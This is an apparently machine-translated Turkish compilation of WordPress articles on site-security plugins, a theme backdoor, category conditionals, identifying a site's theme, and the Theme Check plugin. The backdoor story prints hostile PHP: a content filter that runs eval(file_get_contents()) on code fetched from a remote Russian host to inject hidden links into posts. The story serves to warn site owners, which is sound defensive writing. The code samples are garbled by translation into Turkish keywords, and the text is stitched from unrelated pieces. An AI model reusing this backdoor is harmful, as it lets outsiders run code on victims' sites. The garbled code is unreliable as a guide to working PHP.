Sitenin kötü niyetli virüslere karşı periyodik olarak kontrol edilmesi gereklidir; bu, kendine saygı duyan herhangi bir web yöneticisinin ilk emridir. Temiz bir Twenty Eleven teması kullansanız bile, zamanla virüs bulaşmadığı da bir gerçek değil. Bu fenomen, WordPress motorunun orijinal olarak çevrimiçi yayıncılık için tasarlanmış olması nedeniyle ortaya çıkabilir (ve çoğu zaman gerçekleşir). Bu yüzden tekrar kontrol edip sitenin ve veritabanının bir kopyasını almaktan asla zarar gelmez.

Örneğin, (bir süre sonra elbette) kendim için bir sonuç çıkardım - sadece iyi bir ev sahibine ihtiyacınız var ve rezervasyon sorunlarınız kendiliğinden ortadan kalkacak. Şimdi veritabanının veya sitenin yedeğini almam gerekmiyor - barındırıcı benim için her şeyi otomatik olarak yapıyor. Dilerseniz istediğiniz zaman blogunuzun herhangi bir bölümünün bir kopyasını sipariş edebilir (yalnızca değil), bu kopyayı indirebilir veya blogu doğrudan kontrol panelinden geri yükleyebilirsiniz. Yani, bir yedekleme indirmeme gerek yok, her şey otomatik olarak gerçekleşir - yedekleme, geri yükleme vb. Bu uygun çünkü blogumda bir virüsün ne zaman ortaya çıktığını sadece güne göre değil, saate göre izleyebiliyorum ve buna göre onu ortadan kaldırmak için önlemler alabiliyorum.

İyi haberle başlayacağım - kullandığım en az iki eklenti güzel sonuçlar kötü amaçlı kodun tespiti ve yerelleştirilmesi. Bunlar AntiVirus ve Exploit Tarayıcı eklentileridir. Blogunuzda ne kadar kötü kod olduğuna inanamayacaksınız! Ancak, bir dogma olarak kontrol ettikten sonra ortaya çıkan tüm bilgileri almayın - bu eklentilerin algıladığı birçok satır aslında kendi içinde kötü bir şey taşımaz. Sadece eklenti bazı satırları sorguluyor, hepsi bu. Bunu doğrulamak için eklentinin kötü amaçlı olarak tanımladığı parçaları manuel olarak kontrol edin. Yani, eklentiyi kontrol ederken AntiVirüs Get_cache_file() işlevine yapılan basit bir çağrının bile eklenti tarafından şüpheli olduğu ortaya çıktı. Bu nedenle, kontrollerin tüm sonuçlarının manuel olarak izlenmesi gerekecektir. Ancak bu, örneğin, gerçekten virüslü bir bağlantıdır ve kaldırılması gerekir:

Bunun bir virüs olup olmadığını veya olması gerektiğini nasıl anlarsınız? Her şey çok basit - temiz şablonunuzu (varsa) karşılaştırın ve (dosya bazında) kurulu ve zaten bazı değişikliklerden geçmiş olanla karşılaştırın. Doğrudan ve kelimenin tam anlamıyla bir karşılaştırma yapmak gerekli değildir, sadece temiz şablonunuzun eklentinin vurguladığı satırı içerip içermediğini kontrol etmek için bir arama yapın. Varsa, "Bu bir virüs değildir" düğmesine tıklayın ve bir sonraki kontrol sırasında bu satır dikkate alınmayacaktır.

Ve işte denediğim ikinci eklentinin bir örneği - Tarayıcıdan Yararlanma

Gördüğünüz gibi, burada her şey çok daha ihmal ediliyor. Benim için bu sonuç şok ediciydi. Ama hepsi bu değil. Eklentinin kontrol etme gibi bir işlevi vardır. Yani, açarsanız, blogun metinden ve en fazla birkaç CSS tablosundan oluşması gerektiği ortaya çıkıyor. Yani, bana öyle geliyor ki, eklentinin yazarı burada güvenlik konusunda açıkça abarttı. Eklentinin yalnızca virüslü olduğu iddia edilen parçaları göstermesi ve bunları temizlememesi iyi bir şey.

Sarı ile vurgulanan tüm satırları analiz ettikten sonra, kötü amaçlı yazılımı (kötü amaçlı kod) kolayca tespit edebilirsiniz, peki, bununla ne yapacağınız size kalmış. Temizleme yöntemi hala aynı - seçilen kodu site yedeğiyle karşılaştırın (bkz.) ve tutarsızlıklar bulursanız, bunu kendiniz mi yoksa birisinin sizin için mi yaptığını öğrenin, bu artık iyi olmadığı anlamına gelir ve virüs olabilir. WordPress geliştiricileri bile, bu özel eklentiyle siteyi kötü amaçlı kodlara karşı kontrol etmenizi önerir. Ancak, örneğin bir iframe'in gövdesinde, eklentinin virüslü kod olarak da algılayabileceği bu tür zararsız ekler vardır. Ama aslında bu satırlar olmadan blogunuzun bu bölümü düzgün çalışmayacaktır.

Kötü amaçlı yazılım blog dosyalarına nasıl girebilir ve tanımı gereği nedir? Kötü amaçlı yazılım kelimesi kelimenin tam anlamıyla - kötü niyetli yazılım , İngilizce kötü amaçlı yazılımdan. Bu, siteye ve içeriğine yetkisiz erişim için kullanılabilecek herhangi bir yazılımdır. Muhtemelen eğitimli ortalama bir bilgisayar korsanı için, özellikle kayıt olduktan sonra bir siteyi hacklemenin zor olmayacağını hayal ediyorsunuz. Bundan sonra, blogun içeriğini istediğiniz gibi değiştirebilirsiniz - bu eğitim olacaktır.

Kötü amaçlı kötü amaçlı yazılım, yüklediğiniz eklentilere de eklenebilir. bilinmeyen kaynak ve bazen kontrol etmeden, ancak yazara güvenerek aldığınız komut dosyalarında. En zararsız kötü amaçlı yazılım, siteye yüklediğiniz bazı modüllerin yazarına bağlantıdır. Ve yazarın kendisi sizi böyle bir bağlantının var olduğu konusunda uyarmadıysa, bu zaten saf virüstür.

Bu yüzden bir test bloguna yükledim yeni Konu ve sitenin bodrum katındaki bir tür erkek kulübüne zararsız bir bağlantıyı kaldırdıktan sonra, hiç açılmayı bıraktı ve ana sayfada bir yazıt belirdi - "Bağlantıları silme hakkınız yok." İşte size ücretsiz bir tema. Bu tür sol bağlantıları nasıl yırtacağınızı okuyabilirsiniz.

Veritabanınız kötü amaçlı kod çalıştırmak için de kullanılabilir. Spam içerikli bağlantılar da sıklıkla gönderilere veya yorumlara eklenir. Bu tür bağlantılar genellikle şu durumlarda gizlenir: CSS yardımı böylece deneyimsiz bir yönetici onları görmez, ancak arama sistemi hemen ayırt edin. Tabii ki, burada herhangi bir antispam devreye girer, örneğin lisanslı, kontrol edilen ve birçok kez yeniden kontrol edilen antispam. Bilgisayar korsanı, görüntü dosyası uzantılı dosyaları indirebilir ve bunları etkinleştirilmiş eklentilerinizin koduna ekleyebilir. Bu nedenle dosyanın php uzantısı olmasa bile o dosyadaki kod çalıştırılabilir.

Kötü amaçlı yazılımlarla tanışmaya başladığım başka bir basit araç daha var - Theme Authenticity Checker (TAC) eklentisi. Hafif ve yeterince güçlüdür, ancak yalnızca konularınızı, hatta aktif olmayanları bile kontrol eder. Dizinlerin geri kalanına dokunmuyor ve bu onun eksi. Bu eklenti ile mevcut temamı kontrol ettiğimde elde ettiklerim:

Aktif konuda iki uyarı var, başka bir şey yok. Kötü amaçlı kod yoktur. Bu arada, Google'ın tavsiyesi üzerine kendim eklediğim bağlantılar bunlar - snippet'in kalitesini artırmak için (kişisel verileri, kuruluşun adresini vb. göster). Ancak bu sadece tema dosyalarını kontrol ediyor ve diğer dizinlerde ne yapıldığını, diğer eklentilerin veya çevrimiçi hizmetlerin yardımıyla öğrenmeniz gerekecek. Örneğin, Google'da Yandex Webmaster veya benzeri bir hizmet (güveni hak ediyor). Herhangi bir web kaynağını kötü niyetli eklentiler için kontrol etme işlevine sahiptirler ve bunu verimli bir şekilde yaparlar. Ancak bu sizin için yeterli değilse, sonuçları diğer hizmetlerdeki sonuçlarla karşılaştırın ve sonuçlar çıkarın.

Nedense eklentilere değil Yandex'e inanmak istiyorum. Bir başka iyi kaynak ise http://2ip.ru/site-virus-scanner/. Bloglarımdan birini kontrol ettikten sonra şunları buldum:

Burada, bu tür şüpheleriniz varsa, kötü amaçlı kod için tek tek dosyaları da kontrol edebilirsiniz. Genel olarak servis iyi.

Yukarıdakilerin hepsinden, aşağıdaki sonuçları çıkarırım:

1. Kötü amaçlı kodun ortaya çıkmasını önlemek için, öncelikle dosya indirmek için güvenilir hizmetleri kullanmalısınız - eklentiler, temalar vb.

2. Sitenin içerdiği her şeyin - veritabanları, içerik, yönetici paneli, yüklenen üçüncü taraf dosyaları dahil olmak üzere düzenli olarak yedek kopyalarını alın.

3. WordPress tarafından sunulan güncellemelerin keyfini çıkarın. Her zaman işlevsel olarak haklı olmasalar da, en azından virüs içermezler. Ancak güncelleme yaparak, mevcut olabilecek virüsleri kaldırmış olursunuz.

4. Kullanılmayan temalar, eklentiler, resimler ve dosyalar, pişmanlık duymadan silin - bu, asla tahmin edemeyeceğiniz kötü amaçlı yazılımlar için başka bir geri dönüş.

5. FTP erişiminizi, PhpAdmin oturum açmanızı, yönetici panelinizi ve genel olarak, sizden başka kimsenin erişiminin olmaması gereken yerlerde parola ile koruduğunuzdan emin olun.

6. Deneyin (bu arzu gökyüzü kadar büyük olsa bile) WordPress çekirdek dosyalarını değiştirmeyin veya değiştirmeyin - geliştiriciler neyin nasıl çalışması gerektiğini daha iyi bilirler.

7. Virüsleri tespit edip kaldırdıktan sonra tüm şifreleri değiştirin. Farklı kayıtlarda ve özel karakterlerle 148 karakterlik bir şifre yapmak için büyük bir istek duyacağınızı düşünüyorum. Ama kendini fazla kaptırma karmaşık şifreler, onu kaybedebilirsin ve sonra çok hoş olmayan her şeyi geri yüklemelisin.

Bahsettiğim virüslerden kurtulmanıza yardımcı olacak tüm bu yöntemler ve bileşenler elbette ücretsizdir ve elbette neredeyse ev yapımıdır ve elbette sitenizin temizleneceğine dair %100 garanti vermemektedir. kötü niyetli ekler Bu nedenle, blogu temizleme konusunda zaten endişeleriniz varsa, örneğin hizmette profesyonellerle iletişime geçmek daha iyidir. Sucuri(http://sucuri.net/). Burada siteniz dikkatle izlenecek, size mektupla gönderilecek pratik öneriler verilecek ve siteyi kendiniz temizlemek istemiyorsanız, her şeyi mümkün olan en iyi şekilde yapacak uzmanlar hizmetinizdedir. 4 saat içinde:

Eh, izlemeden sonra test blogum böyle görünüyor ve bu, diğer yöntemlerin (homebrew) her zaman farklı sonuçlar göstermesine rağmen. Gördüğünüz gibi, test ücretsizdir, ancak virüs bulunursa, siteye zarar vermeden kaldırılması için ödeme yapmalısınız (tabii ki, kötü amaçlı yazılımlardan blog temizleme gurusu değilseniz).

Bilgisayar korsanlarının tetikte olduğunu, virüslerin sürekli güncellendiğini ve her şeyi kendi başınıza takip etmenin imkansız olduğunu bir kez daha vurgulayayım. Tüm yenilikler o kadar dikkatli bir şekilde gizlenir ve gizlenir ki onları yalnızca ekip ortaya çıkarabilir! profesyoneller, birçoğunun kendi kendini yetiştirmiş blog yazarı değil. Bu nedenle, kötü amaçlı yazılımların manuel olarak algılanması ve kaldırılması çok etkisizdir: deneyim yok - sonuç yok, ancak bir virüs var. Kullanmak lisanslı programlar ve tehlikenin ortadan kaldırılmasını profesyonellere emanet edin

Merhaba arkadaşlar. Web siteleriniz ve bloglarınız için kullandığınız ücretsiz WordPress şablonunun gerçekten güvenli olduğundan ve gizli tehditler ve kötü amaçlı kod içermediğinden emin misiniz? Bundan tamamen emin misin? Kesinlikle?)

Şablonu çalıştırdıklarını, içindeki gizli bağlantıları kaldırdıklarını ve işin bittiğini düşünüyorsunuz. Site dosyalarını periyodik olarak bir antivirüs ile tararsınız, Güvenlik sekmesindeki Yandex web yöneticisi araçlarına bakarsınız ve rahat bir şekilde orada bir mesaj görürsünüz: “ Sitede kötü amaçlı kod bulunamadı«.

Ben de öyle düşündüm. seni üzmek istemem ama...

Ücretsiz WordPress Temalarında Gizli Tehlikeli Kod

Bu, geçen hafta postayla hostingimden aldığım mektup. Son zamanlarda, kötü amaçlı içerik için tüm site dosyalarını düzenli olarak kontrol ettiler ve yine de bu içeriği bende buldular!

Her şey bir gün siteme gittiğim ve onu başlatamadığım gerçeğiyle başladı - php uzantılı bulunamayan dosyalar hakkında kötü niyetli bir yazı çıktı. Biraz gerildikten sonra, barındırmadaki sitenin bulunduğu klasörün içeriğini incelemeye gittim ve hemen bir sorun keşfettim - fuctions.php şablon dosyam, olduğu gibi belirsiz bir şekilde ima edilen function.php.malware olarak yeniden adlandırıldı - bir antivirüs veya bunun gibi bir şey burada çalıştı) Postayı girdikten sonra, hosterden yukarıdaki raporu buldum.

Her şeyden önce, tabii ki bu dosyayı kontrol etmeye başladım, içeriğini inceledim, her türlü antivirüs, düzinelerce çevrimiçi virüs tarama hizmeti vb. ile taradım. - sonunda hiçbir şey bulamadım, herkes oybirliğiyle dosyanın tamamen güvenli olduğunu iddia etti. Elbette, bir şeyi berbat ettiğinizi söyleyerek ev sahibine şüphelerimi dile getirdim, ancak her ihtimale karşı, kötü niyetli bir kod parçasının keşfi hakkında bir rapor vermelerini istedim.

Ve bana söyledikleri bu

Bu kod hakkında google bilgisine gittim ve ciddi olarak düşündüm ...

Bir şablonda kötü amaçlı kod parçası nasıl bulunur

Görünüşe göre, bu, ilgili tarafların sitenize veri aktarmasına ve sayfaların içeriğini bilginiz olmadan değiştirmesine olanak tanıyan gerçekten önemsiz bir numaradır! Ücretsiz bir şablon kullanıyorsanız, o zaman Aşağıdaki kod için function.php dosyanızı kontrol etmenizi şiddetle tavsiye ederim.:

add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($içerik)(
küresel $yazı;
if(is_single() && ( [e-posta korumalı](get_option('blogoption'))) !== yanlış)(
$co döndür;
) aksi takdirde $içerik döndürür;
}

Çok sığ php bilgimle bile, içeriği yalnızca blog gönderi sayfalarında görüntülemekten sorumlu olan küresel değişken gönderi ve içeriğe bağlı belirli bir filtrenin oluşturulduğu görülebilir (is_single koşulu). Zaten şüpheli değil mi? Şimdi bakalım bu ne gösterecek verilen kod Web sitemizde.

Veritabanında istenen ilginç blog seçeneği de çok şüpheli görünüyor. MySQL veritabanımıza giriyoruz ve orada wp_options adında bir tablo buluyoruz, eğer önekleri değiştirmediyseniz, varsayılan olarak böyle görünecektir. Ve içinde bizim için blogoption adında bir ilgi alanı buluyoruz.

Bu ne güzellik! Aşağıdaki seçeneği görüyoruz


dönüş eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

Şunlar. bize belirli bir siteden (dahası, Rusça, dikkat edin) her şeyi taşıyabilecek içeriği iade edin! Herhangi bir sayıda bağlantı, kötü amaçlı kod, değiştirilmiş metin vb. Sitenin kendisi, ona erişirken, şaşırtıcı olmayan bir 403 erişim hatası veriyor. Elbette bu seçeneği de veritabanından kaldırdım.

Mağdurlardan alınan bilgilere göre, makalenizin tam içeriği genellikle herhangi bir nokta yerine yalnızca bir değişiklikle döndürülür "." metinde açık bir bağlantı maskelendi! Bu arada, bu seçenek, şablonun kendisi yüklendiğinde veritabanına yazılır ve ardından bunu yapan kod güvenli bir şekilde kendi kendini imha eder. Ve iki yıl boyunca böyle saçmalıklarla yaşadım ve tek bir antivirüs veya hizmet bu tehdidi bana tüm bu süre boyunca göstermedi. Dürüst olmak gerekirse, bu tekniğin benim için işe yarayıp yaramadığını veya güvenlik eklentimin bu olasılığı engellediğini (veya WordPressa güncellemelerinden birinin bu açıklığı kapattığını) fark etmedim, ancak yine de hoş değil.

Bedava peynirin ahlakı

Şablonları "çevirmenlerimizin" (veya onları kataloglarında yayınlayanların) karmaşıklığını nasıl buluyorsunuz? Altbilgiden bağlantıları kesmek senin için değil) Yazık ki şablonumu nereden indirdiğimi hatırlamıyorum, uzun zaman önceydi, yoksa birkaç sevgi dolu yazı yazardım. Ve o zaman şimdi sahip olduğum deneyime sahip olsaydım, o zaman kesinlikle ücretsiz bir şablon kullanmazdım veya aşırı durumlarda bilinmeyen kaynaklardan indirmezdim!

Aynısı üzerinde 15-20 dolar karşılığında bazı resmi premium şablonları satın almak ve içinde hiçbir delik ve şifreli bağlantı olmadığını bilerek huzur içinde yaşamak daha kolaydır ve güvenlik açıkları olsa bile, geliştiriciler kesinlikle bunların olduğu bir güncelleme yayınlayacaktır. delikler kapatılacaktır. ( Bu arada, Artem kısa süre önce sadece premium şablonlardan bahsettiği ve hatta ilgilenenler için acımasız indirimler için promosyon kodlarını dağıttığı bir makale yayınladı.)

Kayıtları görüntülediğinizi ve değiştirmeniz gerektiğini hayal edin. dış görünüş rubriğe göre değişir. Örneğin, bir makalenin yazarı hakkında bilgi görüntüleyen bir "YAZAR HAKKINDA" bloğunuz var, ancak bu bloğu, örneğin bunun gerekli olmadığı bir kategorideki gönderilerin altında görmek istemiyorsunuz. Ayrıca belirli kategorilerde, küçük resimlerde vb. yorum yapmayı devre dışı bırakabilirsiniz. Her şey ihtiyaçlarınıza ve fantezilerinize bağlıdır. Şahsen, bu durumu çok sık kullanırım.

Kategoriye bağlı olarak girişleri filtrelemek için işlev yardımcı olacaktır - in_category(). Bu işlev, mevcut veya verilen girişin istenen kategoriye, kuyuya veya birkaç kategoriye ait olup olmadığını kontrol eder. Çoğu zaman, bu işlev bir dosyada çıktı olarak verilir. tek.php, çünkü kayıtları görüntülemekten sorumludur.

Fonksiyonu kullanmanın en basit yolu şuna benzer. Bu kodu single.php dosyasına ekliyoruz, gerekirse etiketleri PHP içine alıyoruz.

PHP etiketleri şöyle görünür:

Temanız çoğunlukla HTML kodu kullanıyorsa, aşağıdaki kodu değiştirmeden yapıştırın. Esas olarak PHP kullanılıyorsa, kodun içinde bulunduğu etiketler kaldırılabilir.

Bu kodda, eğer mevcut gönderi ID - 12 olan bir kategoriye aitse, o zaman bir şeyin gösterilmesi gerektiğini şart koşarız. Ne istersen, kaşlı ayraçların içine ekle. PHP kodu olmalı, eğer zorsa ve HTML kodu eklemeniz gerekiyorsa, kodu aynı PHP etiketleri ile kırın ve kod şu şekilde olacaktır:

//buraya normal HTML kodunu veya sadece metni yazıyoruz.

Kategorilerin kimliğini belirlemek için yönetici panelindeki kategori listesine gitmeniz ve istediğiniz kategorinin üzerine gelmeniz gerekir. Tarayıcı penceresinin altında, sağ tarafta, içinde ID=1 gibi bir şey olacak, yani bu kategorinin kimliği 1 olan bir bağlantı görünecektir.

Birkaç kategori belirtmeniz gerekiyorsa, bunları virgülle ayırarak belirtin. Ayrıca bir "IF - THEN" koşulu oluşturmanız gerekebilir, o zaman kod şöyle olacaktır:

12 numaralı değerlendirme listesinde bir gönderi küçük resmi ve diğer değerlendirme listelerindeki diğer gönderilerdeki metindeki ilk resmi görüntülemeniz gerektiğini düşünün. Bu olur mu ve nasıl yapılır? Yukarıdaki kod ile. Makaledeki kayıttan ilk görüntünün çıktısını okuyabilirsiniz -

Şimdi bu fonksiyona eklenebilecek bir özelliği daha göstermek istiyorum. Dereceli puanlama anahtarlarının alt kategorileri, yani alt kategorileri olduğu görülür. Ve giriş alt kategorilerden birine aitse, koşul onu atlayacaktır. İhtiyacınız olan şey buysa, hiçbir şeye dokunamazsınız, ancak yine de koşul alt başlıklar için çalışıyorsa, koşula bir ekleme yapmanız gerekir. Başlamak için, koşulun kendisine aşağıdaki kısmı eklemeniz gerekir - || post_is_in_descendant_category(12). Bu, alt kategorileri kontrol edecek yeni işlevimize yapılan bir çağrıdır. Bitmiş kod şöyle görünecek:

Yeni bir fonksiyonun çalışmaya başlaması için bu fonksiyonun kodunu kendi eklemeniz yani yazmanız gerekiyor. Bunu yapmak için, aktif temalı klasörde dosyayı bulun. işlevler.php, kullanıcı tanımlı işlevleri içeren. PHP'ye aşina değilseniz, dosyanın en sonuna kod eklemeniz gerekir, ancak bir kapanış varsa PHP etiket - ?> , o zaman ondan önce eklemeniz gerekir. Kodun kendisi şöyle görünür:

işlev post_is_in_descendant_category($cats, $_post = null) ( foreach ((dizi) $cats as $cat) ( // get_term_children() yalnızca tamsayı kimliğini kabul eder $descendants = get_term_children((int) $cat, "category"); if ($descendants && in_category($descendants, $_post)) return true; ) false döndür; )

Her şey doğru yapılırsa, durumunuz belirli kategoriler ve bunların alt kategorileri için gönderileri seçecektir.

Uzun zaman önce bu makaleyi yazmaya başladım, ancak tüm eller bitirmek için ulaşmadı, sonra bir, sonra ikincisi kesintiye uğradı. Son olarak, makale bitti ve belki de birçoğu sorunu çözmeye yardımcı olacaktır.

Hepsi bu, ilginiz için teşekkürler. 🙂

Belirli bir sitenin hangi temayı kullandığını hiç merak ettiniz mi?

Çoğu zaman, mükemmel temayı ararken, benzer bir şey bulmak veya sitemizi aynı tema üzerinde, yalnızca kendi bireysel tasarımımızla yapmak için tamamlanmış diğer projelere bakarız.

Bu eğitimde, bu WordPress sitesinin hangi temayı kullandığını öğrenmek için kullanabileceğiniz araçları ve püf noktalarını göstereceğiz.

Yöntem 1: IsItWP Doğrulama Sitesi

En kolay yol isitwp.com'a gitmek ve ilgilendiğiniz siteye göz atmak.

Bu, WordPress'in hangi temayı kullandığını ve sitede WordPress kullanılıp kullanılmadığını gösteren çevrimiçi bir araçtır.

Site WordPress çalıştırıyorsa, IsItWP mevcut temanın adını bulmaya çalışacaktır.

Ayrıca sitede hangi aktif eklentilerin kullanıldığını bulmaya çalışacaktır:

Şanslıysanız ve bu özel veya alt tema değilse, IsItWP size temanın adını verir ve bu temayı daha fazla arayabilirsiniz.

Yöntem 2. El ile tanımlayın

Bazen site sahipleri veya geliştiriciler yerel sitenin adını değiştirir. WordPress temaları. Bu durumda IsItWP gibi araçlar size yardımcı olamaz.

Ancak yine de site kodunda, ne tür bir temanın yüklendiğini anlamanıza yardımcı olacak çeşitli ipuçları olabilir.

Bakalım.

Her WordPress temasının bir stil.css. Bu dosyanın içinde, kural olarak tema adını, tema yazarını, sürümünü ve tema geliştirici sitesini belirten bir başlık bulunur. Ayrıca temanın kullandığı diğer css şablonlarını da belirtir.

Bu dosyayı bulmak için önce sitenin kendisine gitmeniz gerekir. Ana sayfada bir yere sağ tıklayın ve kaynak kodu görünümüne gidin ( Sayfa kaynağını göster).

Sitenin ana sayfasının kaynak kodu tarayıcıda yeni bir sekmede açılacaktır.

Şimdi şuna benzeyen bir kod satırı bulmanız gerekiyor:

İşleri kolaylaştırmak için bu sekmede snippet koduyla arama yapabilirsiniz " temalar". Bu, dizinin bulunduğu dizinin bir parçasıdır. stil.css.

Böylece style.css dosyasının bulunduğu yolu bulacaksınız ve bu dosyayı doğrudan tarayıcıda yeni bir sekmede açabilirsiniz.

style.css dosyasının en üstünde başlığı olan (yukarıda bahsettiğimiz) bir başlık olacaktır. Bu, temayla ilgili hizmet bilgisidir. Şuna benziyor:

/* Tema Adı: Tema Adı Tema URI'si: https://example.com Yazar: ThemeAuthorName Yazar URI'si: https://example.com Açıklama: My Theme, portföy web siteleri için tasarlanmış esnek bir WordPress temasıdır Sürüm: 1.1.47 Lisans: GNU Genel Kamu Lisansı v2 veya üzeri Lisans URI'si: http://www.gnu.org/licenses/gpl-2.0.html Metin Alanı: hestia Etiketler: blog, özel logo, portföy, e-ticaret, rtl-dil desteği , post-formts, grid-layout, tek-sütun, iki-sütun, özel-arka plan, özel-renkler, özel-başlık, özel-menü, özellikli-görüntü-başlığı, özellikli-görüntüler, esnek-başlık, tam genişlik -şablon, yapışkan gönderi, tema seçenekleri, zincirleme yorumlar, çeviriye hazır */

Bu bloktan konunun adını ve geliştiricinin adresini öğrenebilirsiniz. O zaman sadece bu konuyu internette bulmak için kalır.

Yöntem 3. Ana tema nasıl bulunur

Birçok site, görünümü özelleştirmek için alt temalar kullanır. Ve bu oldukça doğru bir yaklaşım.

Bu durumda, dosyayı bulduysanız stil.css bir alt temadan, başlığı ana tema hakkında bilgi içerecektir:

/* Tema Adı: My Child Tema Açıklama: Sadece bir alt tema Yazar: Peter Smith Yazar URL'si: Buraya yazarın blogunu veya web sitesi url'sini yazın Şablon: hestia Sürüm: 1.0 Lisans: GNU Genel Kamu Lisansı v2 veya üstü Lisans URI'si: http :/ /www.gnu.org/licenses/gpl-2.0.html Metin Alanı: benim-çocuk-temam */

Yukarıdaki örnekte, " parametresi Şablon", bu, "Hestia" ana temasının bu alt tema için kullanıldığı anlamına gelir.

Ayrıca, Yöntem 2'de açıklanan kaynak koddan ana tema hakkında bilgi edinebilirsiniz. Kodda, yalnızca alt temadan değil, aynı zamanda ana temadan da style.css dosyasına bir başvuru bulacaksınız.

Ancak, geliştiricinin style.css için tüm başlıkları deneyip kendi başlarına değiştirebileceğini unutmayın, bu durumda orijinal temayı belirlemek çok zor olacaktır.

Tema kontrol eklentisi, temanızı test etmenin ve en son tema inceleme standartlarıyla uyumlu olduğundan emin olmanın kolay bir yoludur. Bununla birlikte, yapabilirsiniz WordPress.org'un tema gönderimleri için kullandığı tüm otomatik test araçlarını temanızda çalıştırın.

Testler basit bir yönetici menüsü üzerinden yürütülür ve tüm sonuçlar bir kerede görüntülenir. Bu, tema geliştiricileri veya temalarının en son WordPress tema standartlarını ve uygulamalarını desteklediğinden emin olmak isteyen herkes için çok kullanışlıdır.

iz biçimlendirme nasıl etkinleştirilir

Tema İnceleme ekibi, temaları gözden geçirirken bu eklentiyi kullanır ve çıktıyı trac biletlerine kopyalayıp yapıştırır, trac sisteminin kendi biçimlendirme dili vardır.
Theme-Check'te iz biçimlendirmesini etkinleştirmek için wp-config.php'de birkaç değişken tanımlamanız gerekir:
TC_PRE ve TC_POST bilet üstbilgisi ve altbilgisi olarak kullanılır.
Örnekler:
define('TC_PRE', 'Tema İncelemesi:[]
- Temalar "define(\'WP_DEBUG\', true);" kullanılarak gözden geçirilmelidir. wp-config.php[]
— Temalar, Tema Kontrol Listelerinden (TC) alınan test verileri kullanılarak gözden geçirilmelidir.
——
‘);

Define("TC_POST", "Herhangi bir sorunuz, yorumunuz veya geri bildiriminiz varsa aşağıdaki iletişim bilgilerini kullanmaktan çekinmeyin:[] [] * Bu bilete bir yorum bırakın[] * Tema İnceleme e-postasına bir e-posta gönderin list[] * Freenode'da #wordpress-themes IRC kanalını kullanın.");

Eğer herhangi biri bu iki değişkenden tanımlandığında, yanında yeni bir trac onay kutusu görünecektir. Kontrol et! buton.

Sıkça Sorulan Sorular

Sürüm numaraları ne durumda?

Sürüm numarası, onu oluşturmak için kullanılan kılavuzların revizyon tarihidir.

Neden bir şeyi kötü olarak işaretliyor?

Bu, "kötü" şeyleri işaretlemiyor. Tema denetimi, Tema İnceleme yönergelerine uygunluğu test etmenin mükemmel olmayan bir yolu olacak şekilde tasarlanmıştır. Tüm temalar bu yönergelere uymak zorunda değildir. Kontrol aracının amacı, merkezi WordPress.org tema deposuna yüklenen temaların en son WordPress tema standartlarını karşılamasını ve çok çeşitli sitelerde çalışmasını sağlamaktır.

Birçok site özelleştirilmiş temalar kullanır ve bu tamamen sorun değil. Ancak, halk tarafından birçok farklı türde sitede kullanılması amaçlanan temaların, birçok farklı ortamda düzgün çalışmasını sağlamak için belirli bir minimum düzeyde yeteneklere sahip olması gerekir. Tema İnceleme yönergeleri bu amaç göz önünde bulundurularak oluşturulmuştur.

Bu tema denetleyicisi mükemmel değil ve asla olmayacak. Yalnızca tema yazarlarına veya temalarını daha yetenekli hale getirmek isteyen herkese yardımcı olan bir araçtır. WordPress.org'a gönderilen tüm temalar, bir uzman ekip tarafından elle incelenir. Otomatik tema denetleyicisi, mutlak bir ölçüm sistemi değil, yalnızca yararlı bir araç olarak tasarlanmıştır.

Bu eklenti değil kullanılan yönergelere karar verin. Belirli tema inceleme yönergeleriyle ilgili herhangi bir sorun, Tema Oluştur sitesinde tartışılmalıdır.

İncelemeler

Bu, bir WordPress teması geliştirmeyi ve temel WordPress standartları için başarılı testler yapmayı gerçekten seven herkes için harika bir eklentidir. Hatalar "Gerekli", "Uyarı", "Önerilen" ve "bilgi" bölümlerine ayrılmıştır. Ayrıca bu hatanın temel bilgilerini de sağlayın ve sorunun nerede olduğunu anlamanızı sağlar.

Üyeler ve Geliştiriciler

Theme Checker açık kaynaklı bir projedir. Aşağıdaki katkıda bulunanlar eklentinin geliştirilmesine katkıda bulunmuştur:

Üyeler

Değişiklik günlüğü

20190801.1

  • Yönetici sayfasındaki eksik nonce ve nonce kontrolünü düzeltin. Steven Stern'i sorunu eklentiler ekibine bildirdiği için destekler. Bu teknik olarak bir CSRF olmasına rağmen, formla yapılabilecek tek şey bir temayı taramak olduğundan, bundan kaynaklanan bir güvenlik açığı yoktur.

20190208.1

  • Blok düzenleyici için yeni stiller ekleyin. https://meta.trac.wordpress.org/ticket/3921 adresine bakın.

20160523.1

  • İçinde tire bulunan tema adları için düzeltme
  • Değişiklikleri kaldıran yorumlar
  • Tema inceleme ekibi ve diğerleri tarafından yapılan birçok değişiklik. Tam değişiklik listesi için Github'a bakın.

20151211.1

  • Github ve orada meydana gelen tüm değişiklikler ile tam senkronizasyon.
  • 4.4 kullanımdan kaldırılan işlevler için yayın.

20140929.1

  • Automattic'te Frank Klein'dan yeni kontroller ve güncellemeler eklendi. Teşekkürler Frank!
  • Kullanımdan kaldırılan işlev listeleri güncellendi
  • Özelleştirici kontrolü: Tüm add_settings, güvenlik için temizleme geri aramalarını kullanmalıdır
  • Eklenti bölge kontrolleri: Temalar, gönderi türlerini veya sınıflandırmalarını kaydetmemeli veya gönderi içeriği için kısa kodlar eklememelidir
  • Widget'lar: register_sidebar'a yapılan çağrılar, widgets_init eylem kancasından çağrılmalıdır
  • Başlık: etiketler mevcut olmalıdır ve yok wp_title() çağrısı dışında içlerinde herhangi bir şey var
  • CDN: Yaygın CDN'lerin kullanımını kontrol eder (yalnızca önerilir)
  • Not: Eski URI'lerin geçersiz olması nedeniyle değiştirilmiş eklenti ve yazar URI'leri. Bunlar gelecekte tekrar değişebilir, kendi sitemin URI'leri yalnızca geçicidir.

20131213.1

  • Eklenti tarafından görüntülenmeyen ve yanlış bir şekilde her şeye "geçti" sonucu veren düzeltilmiş hatalar.

20131212.1

  • 3.8 için güncellendi
  • Çoğu dosya daha iyi I18N desteği için değiştirildi, bu nedenle çeviri yeniden yapılana kadar dil dosyaları geçici olarak kaldırıldı.

20121211.1

  • 3.5 için güncellendi
  • PayPal düğmesini kaldırın.

20110805.1

  • TimThumb kontrolleri kaldırıldı.
  • Ekran görüntüsü artık dosya boyutu ve boyutlarla birlikte sonuçlarda önizleniyor.

20110602.2

  • Yeni dosya listesi işlevleri gizli klasörler artık algılanabilir.
  • Daha iyi fopen kontrolleri.
  • Tim Başparmak sürüm yumru

20110602.1

